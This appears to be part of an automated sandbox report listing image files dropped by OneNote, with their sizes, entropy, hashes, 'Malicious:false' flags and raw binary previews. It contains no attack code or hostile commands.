                                                                                                        SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84941
                                                                                                        Entropy (8bit):7.966881945560921
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                        MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                        SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                        SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                        SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):242903
                                                                                                        Entropy (8bit):7.944495275553473
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                        MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                        SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                        SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                        SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
